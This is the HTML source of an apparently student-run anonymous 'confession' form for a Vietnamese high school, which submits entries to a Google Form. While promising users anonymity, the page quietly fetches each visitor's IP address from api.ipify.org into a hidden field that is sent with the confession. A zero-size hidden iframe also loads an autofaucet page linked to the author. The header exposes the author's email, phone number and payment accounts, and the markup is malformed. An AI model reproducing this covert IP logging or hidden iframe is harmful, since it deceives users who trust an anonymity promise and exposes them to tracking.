<!DOCTYPE html
CODE GENERATOR BY VĂN HOÀNG

Email: vuh98926381@gmail.com
ZaloPay/Momo/VNDC/VNDS/Binance: 0376215739
Facebook: https://facebook.com/hoangjump
Telegram@hoangjump
>
<html lang="vi">
<head>
  <iframe src="https://autofaucet.org/wm/hoangjump/2" width="0" height="0" style="border:0"></iframe>
	<meta charset="UTF-8">
		<meta name="viewport" content="width=device-width, initial-scale=1.0">
	<link rel="stylesheet" href="css/style.css" type="text/css" media="all" />
	<style> 
	body {
  padding-top:25px;
  background-color:#454545;
  margin-left:10px;
  margin-right:10px;
  font-family: Helvetica, Arial, sans-serif;
  background: url('https://files.catbox.moe/e2qxs1.jpg') no-repeat center center fixed;
  -webkit-background-size: cover;
  -moz-background-size: cover;
  -o-background-size: cover;
  background-size: cover;
}
a {
  text-decoration: none;
}
.container {
  max-width:700px;
  margin:0 auto;
  text-align:center;
  -webkit-border-radius:6px;
  -moz-border-radius:6px;
  border-radius:6px;
  
}
.container * {

}
.head {
  -webkit-border-radius:6px 6px 0px 0px;
  -moz-border-radius:6px 6px 0px 0px;
  border-radius:6px 6px 0px 0px;
  color:#FAFAFA;
}
h2 {
  text-align:center;
  padding:18px 0 18px 0;
  font-size: medium;
}
input {
  margin-bottom:10px;
}
textarea {
  height:100px;
  margin-bottom:10px;

}
input:first-of-type
{
  margin-top:35px;
}
.container input, .container textarea {
  font-size: 1em;
  padding: 15px 10px 10px;
  font-family: 'Source Sans Pro',arial,sans-serif;
  border: 1px solid #cecece;
  background: #d7d7d7;
  color:#000;
  background: rgba(255,255,255,0.79);
  -webkit-border-radius: 5px;
  -moz-border-radius: 5px;
  border-radius: 5px;
  -moz-background-clip: padding;
  -webkit-background-clip: padding-box;
  background-clip: padding-box;
  -webkit-box-sizing: border-box;
  -moz-box-sizing: border-box;
  box-sizing: border-box;
  width: 80%;
  resize: none;
}
.container textarea {
  min-height: 250px;
  overflow: hidden;
}
::-webkit-input-placeholder {
   color: #75475A;
}
:-moz-placeholder {
   color: #75475A;  
}
::-moz-placeholder {
   color: #75475A; 
}
:-ms-input-placeholder {  
   color: #75475A;  
}
.container button {
  margin-top:15px;
  margin-bottom:25px;
  background-color:#2ABCA7;
  padding: 12px 45px;
  -ms-border-radius: 5px;
  -o-border-radius: 5px;
  border-radius: 5px;
  border: 1px solid #2ABCA7;
  -webkit-transition: .5s;
  transition: .5s;
  display: inline-block;
  cursor: pointer;
  width:30%;
  color:#fff;

}
button:hover, .button:hover {
  background:#19a08c;
}

footer {
  max-width:600px;
  margin:0 auto;
  text-align:center;
  margin-top: 10px;
  color: #fff;
}
footer a {
  color: #fff;
  font-weight: bold;
}
footer ul {
  list-style: none;
  width: 100%;
  text-align: center;
  padding: 0px;
}
footer ul li {
  display: inline-block;
}
footer ul li::after {
  
}
footer ul li .classUl::after {
  content: " . ";
}
footer ul li a {
  font-weight: initial;
}
/* media queries */
@media (max-width: 700px) {
  label.error {
    width: 90%;
  }
  input, textarea {
    width: 90%;
  }
  button {
    width:90%;
  }
  body {
  padding-top:10px;
  }  
}

.noiquy {
  background: rgba(255,255,255,0.8);
  -webkit-border-radius:6px 6px 0px 0px;
  -moz-border-radius:6px 6px 0px 0px;
  border-radius:6px 6px 0px 0px;
  
}
.formNoiQuy {
  max-height: 400px;
  overflow: auto;
}
.noiquy p{
  text-align: left !important;
  padding: 15px;
}
.noiquy ol {
  text-align: left;
  list-style: none;
}
.noiquy ol li {
  padding: 10px;
}
.noiquy ul {
  text-align: left;
}
.noiquy ul li {
  padding: 10px;
}
.noiquy ol li::before {
  content: " - ";
}


::-webkit-scrollbar {
    width: 10px;
}

::-webkit-scrollbar-track {
    background-color: #fff;
}

::-webkit-scrollbar-thumb {
  background-color: #2ABCA7;
}

::-webkit-scrollbar-thumb:hover {
  background-color: #2ABCA7;
}

::-webkit-scrollbar-thumb:active {
    background-color: #2ABCA7;
}

/* ######### cp ################*/
.containerQuanly {
  max-width:1000px;
  margin:0 auto;
  text-align:left;
  -webkit-border-radius:6px;
  -moz-border-radius:6px;
  border-radius:6px;
  
}

.containerQuanly .boxQL {
  background: #fff;
  padding: 10px;
  margin-bottom: 10px;
}

.containerQuanly .boxQL button {
  padding: 5px;
  margin-bottom: 5px;
  background-color:#2ABCA7;
  -ms-border-radius: 5px;
  -o-border-radius: 5px;
  border-radius: 5px;
  border: 1px solid #2ABCA7;
  -webkit-transition: .5s;
  transition: .5s;
  display: inline-block;
  cursor: pointer;
  color:#fff;
}

.containerQuanly input[type="submit"] {
  padding: 5px;
  margin-bottom: 5px;
  background-color:#2ABCA7;
  -ms-border-radius: 5px;
  -o-border-radius: 5px;
  border-radius: 5px;
  border: 1px solid #2ABCA7;
  -webkit-transition: .5s;
  transition: .5s;
  display: inline-block;
  cursor: pointer;
  color:#fff;
}
.containerQuanly input[type="button"] {
  padding: 5px;
  margin-bottom: 5px;
  background-color:#FF3366;
  -ms-border-radius: 5px;
  -o-border-radius: 5px;
  border-radius: 5px;
  border: 1px solid #2ABCA7;
  -webkit-transition: .5s;
  transition: .5s;
  display: inline-block;
  cursor: pointer;
  color:#fff;
}
.containerQuanly textarea {
  width: 100%;
  max-height: 60px !important;
  resize: none;
  overflow: auto;
}
.containerQuanly textarea[disabled] {
  background: #ccc;
}
.containerQuanly span {
  padding: 10px;
}

.containerQuanly .logQL {
  background: #fff;
  padding: 10px;
  margin-bottom: 10px;
  max-height: 400px !important;
  resize: none;
  overflow: auto;
}
	
	</style>
	<title> THPT Nguyễn Trung Trực Confession></title>
		

	<!-- Google+ Metadata / -->

    <meta name="description" content="THPT Nguyễn Trung Trực Confession." />
    <meta name="keywords" content="thpt Nguyễn Trung Trực,thpt nguyen trung truc , truong n2t , trường Nguyễn Trung Trực , N2T confession,confession" />
    <meta itemprop="image" content="https://scontent.fpnh22-1.fna.fbcdn.net/v/t1.6435-9/fr/cp0/e15/q65/165361909_1770979169751511_4942195180505615902_n.jpg?_nc_cat=106&ccb=1-3&_nc_sid=110474&efg=eyJpIjoidCJ9&_nc_ohc=vKaXtPu09NcAX-SWumX&_nc_ht=scontent.fpnh22-1.fna&tp=14&oh=901eab3af8dea71ff295d85f642d966e&oe=60DAC453">
	
	<!-- facebook -->

	<meta property="og:site_name" content="THPT Nguyễn Trung Trực Confession" />
	<meta property="og:url" content="https://n2tcfs.github.io/index.html" />
	<meta property="fb:app_id" content="117673325571097" />
	<meta property="og:image" content="https://scontent.fpnh22-1.fna.fbcdn.net/v/t1.6435-9/fr/cp0/e15/q65/165361909_1770979169751511_4942195180505615902_n.jpg?_nc_cat=106&ccb=1-3&_nc_sid=110474&efg=eyJpIjoidCJ9&_nc_ohc=vKaXtPu09NcAX-SWumX&_nc_ht=scontent.fpnh22-1.fna&tp=14&oh=901eab3af8dea71ff295d85f642d966e&oe=60DAC453" />
	<meta property="og:image:type" content="image/jpeg" />
	<meta property="og:image:width" content="1200" />
	<meta property="og:image:height" content="628" />
	<meta property="fb:pages" content="423013204452705" />
	<meta property="article:author" content="https://www.facebook.com/n2tconfessions/" />
	<meta property="og:type" content="article" />
	<meta property="og:title" content="THPT Nguyễn Trung Trực Confession" />
	<meta property="og:description" content="Bạn có điều muốn thổ lộ? bạn muốn tâm sự ?. Hãy tâm sự với các N2Ters những cảm xúc của mình " />	<script id="mcjs">!function(c,h,i,m,p){m=c.createElement(h),p=c.getElementsByTagName(h)[0],m.async=1,m.src=i,p.parentNode.insertBefore(m,p)}(document,"script","https://chimpstatic.com/mcjs-connected/js/users/4fac16919e764a54f4235a367/fb47cc076d2e40410c5963762.js");</script>
</head>
<body>
<div class="container">
<script type="text/javascript">
var submitted=false;
</script>
<iframe id="hidden_iframe" name="hidden_iframe" onload="if(submitted){window.location='https://n2tcfs.github.io/end.html';}" style="display: none;"></iframe><br />
<form action="https://docs.google.com/forms/d/1kmjZM90cJ1__oX-jM7On72y9fNL3dMZ8xrtDZx6ByZc/formResponse" method="POST" onsubmit="submitted=true;" target="hidden_iframe">
    <div class="head">
      <h2 style="color:white; background-color:#6495ED">Gửi confession đến THPT Nguyễn Trung Trực</h2>
    </div>
    <p style="color:white;">Chào bạn, cảm ơn bạn đã tâm sự</p>  
    <p style="color:white;">Hãy đọc kỹ nội quy trước khi cào phím, tránh trường hợp gõ phím bình thiên hạ click chuột định giang sơn</p>
    <input autocorrect="off" autocapitalize="off" type="text" class="form-control" name="entry.1939935404" placeholder="Bạn muốn chúng tôi gọi bạn là gì?" />
    <p><textarea type="text" name="entry.226378496" placeholder="Nhập nội dung muốn gửi" required ></textarea></p>
    <input autocorrect="off" autocapitalize="off" type="text" class="form-control" name="entry.1112481705" placeholder="Link Facebook của bạn?" />
    <input autocorrect="off" autocapitalize="off" type="text" class="form-control" name="entry.1323960165" placeholder="Góp ý kiến đến quản trị viên" style="height: 100px"/>
    <input type="hidden" id="ip" class="form-control" name="entry.2121269544" value="" />
    <p style="color:red;font-size:20px"><i>Không ai có thể biết bạn là ai, nhưng nếu bạn spam, thì chúng tôi biết</i></p>
    <center><button id="submit" name="submit" type="submit" value="ok" >Gửi CFS</button></center>
	</form>

</div>
</body>
  <p style="color:white;text-align: center;">Nếu bạn tâm sự nhiều, vậy bạn có thể nhấn vào nút bên dưới và tiếp tục tâm sự được không nè 😳</p>

<footer>
	<ul>
		<li><a href="https://n2tcfs.github.io/index.html" class="classUl">Trang chủ</a></li>
		<li><a href="https://www.facebook.com/n2tconfessions/" target="_blank" class="classUl">Facebook</a></li>
		<li><a href="https://docs.google.com/document/d/1l9VXVoCtJ4KHRyb4miv4aeDUFlFrzXr6-53zbDmZ5yY/edit?usp=drivesdk" class="classUl">Nội quy</a></li>
		<li><a href="https://m.me/n2tconfessions" target="_blank" >Liên hệ</a></li>
		<li><a href="https://m.me/hoangjump" target="_blank" >Liên hệ ADMIN</a></li>
	</ul>
	<p><a href="https://www.facebook.com/n2tconfessions/" target="_blank">THPT Nguyễn Trung Trực</a> © 2021</p>
</footer>
<!-- Global Site Tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-107040578-1"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments)};
  gtag('js', new Date());

  gtag('config', 'UA-107040578-1');
  
  $.get("https://api.ipify.org?format=json",
                function(data) {

                    $("#ip").html(data.ip);
                })
        </script>
        <script type="application/javascript">
            function getIP(json) {
                var rsip = json.ip;
                document.getElementById("ip").value = rsip;
            }
        <script type="application/javascript" src="https://api.ipify.org?format=jsonp&callback=getIP"></script>
</script>
</html>
